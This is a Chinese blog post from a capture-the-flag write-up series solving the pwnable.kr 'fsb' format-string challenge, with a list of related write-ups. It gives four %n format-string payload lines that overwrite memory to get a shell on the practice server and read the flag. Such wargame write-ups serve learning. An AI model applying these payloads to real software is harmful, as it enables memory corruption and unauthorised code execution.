pwnable.kr fsb writeup

最新推荐文章于 2022-02-05 00:23:45 发布
最新推荐文章于 2022-02-05 00:23:45 发布
阅读量599 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79318235
版权

打完之后看了下别人的wp…..发现我的完全是邪道……(后面又仔细看了下,发现并没有太邪道,其实也是差不多
因为用ssh登录上去执行,所以可以把输出重定向一下 /dev/null 2>&1
这样就可以避免因为传输东西太多而卡死

然后可以直接用下面payload

%134520928c%14$n
%20$n
%134520932c%14$n
%20$n

之后就可以拿到一个shell,虽然这个shell没回显,但是只要把flag复制到tmp,然后再去tmp cat一下就能拿到flag了

charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 425
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
pwnable.krfsb
子曰小玖的博客
06-06 555
https://r00tnb.github.io/2018/02/27/pwnable.kr-fsb/ 前言 这是一道考察printf格式化字符串漏洞利用的题目,总的来说很简单,但是我却花了很长时间,主要是我有点太马虎没仔细分析代码,笑哭。 分析 先分析源代码fsb.c 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 2...
pwnable.kr fsb 知识点总结
qq_43189757的博客
07-12 338
这题是关于格式化字符串漏洞的题目 对于%n 写数据以前一直很模糊,不知道是往栈上写数据,还是以栈上的地址指向的地方写数据,好好想了这题后明白了,%n 是往栈上的地址指向的地址处写入数据 比如: printf(“pwn%n”, &a); printf("%d\n", a); 32位下 会先把&a 压入栈中,在压入format_addr,然后call printf 此时栈上的情况为:...
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3147
典型的格式化字符串漏洞
[BUUCTF-pwn] pwnable_fsb
weixin_52640415的博客
02-05 782
首先是一个小坑,坑人的坑。题目给的32位no PIE的程序与远程上的不同,远程是64位开PIE。 程序先作了一个抬栈,然后可以输入4次printf,再输入key相同则给出shell (远程有原码,很容易看) #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(char** a
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
Writeup.rar
12-01
标题 "Writeup.rar" 暗示这可能是一个关于技术分析或解决问题的文档集合,可能是某项编程竞赛、课程作业或者编程挑战的解决方案。描述中同样提到 "Writeup.rar",意味着这个压缩包可能包含了对某个问题或项目的详细...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
fsb音频解包工具2011最新版
01-31
fsb音频解包工具 国外网站发现的宝贝 可用于 极品飞车 阿帕奇空中冲突 孤岛危机(音效部分)等的提取
FSB音频文件解码
12-14
该工具是本人找到的可以解压出.fsb文件中的wav音频的软件,并且解压出即可播放。工具目录不能有中文,使用时用把fsb文件拖动以fsb_aud_extr.exe打开即可。
pwnable.kr fsb题解
落日领航员の技术栈
04-21 433
漏洞分析YM老师布置的大作业,老师钦点我们组做unexploitable,难度吓人,看了一堆wp,毫无思路,遂自闭,于是先看一个稍微简单一点的格式化字符串漏洞题,收获不小,故写一篇博客记录下来,也希望能帮助到别人 代码分析 #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(cha
pwnable学习笔记-fsb
will_wind的博客
06-17 1162
这是一道有趣的格式化字符串漏洞(Format string bug)。
pwnable.kr-fd
weixin_30326515的博客
05-12 77
题目: 链接登录: ssh fd@pwnable.kr -p2222 查看文件及权限: ls –al 看到flag文件,但是当前用户fd并没有读权限。 cat fd.c 分析程序: int argc 这个东东用来表示你在命令行下输入命令的时候,一共有多少个参数。比方说你的程序编译后,可执行文件是test.exe D:\tc2>test 这个时候,argc的值是1 但是 D:\tc2...
pwnable.kr记录
leeham的博客
08-25 594
pwnable.kr记录 fd col pof
pwnable.kr】 tiny_easy
子曰小玖的博客
06-06 709
https://r00tnb.github.io/2018/02/26/pwnable.kr-tiny_easy/ 前言 考验漏洞利用能力的题目,长姿势了。参考了别人的writeup 分析 没有源代码,就丢ida逆向了 1 2 3 4 5 6 7 8 9 10 11 12 13 14 LOAD:08048054 ; Attributes: nore...
pwnable.kr unexploitable题解
落日领航员の技术栈
04-25 770
前言 这次的大作业可以算是《漏洞分析》这门课有史以来难度最大的一次了。刚接触这道题的时候基本上没思路,加上心思浮躁,在网上疯狂找wp,看了十几篇依旧没看出个门道。于是决定静下心来,先仔细研读了几篇SROP相关的文章,了解基本原理,再一点一点地动手尝试。当然这个历程也是比较艰辛的,一次又一次把自己绕晕,失败,曾经很多次想过干脆换一道题算了,好在最后没有放弃,做出来了,收获满满。 代码分析 #include <stdio.h> void main(){ // no brute for
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1731
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
2020 YCBCTF羊城杯官方Writeup:PHP与Web安全解题技巧实录
2020YCBCTF羊城杯官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在Web、PHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值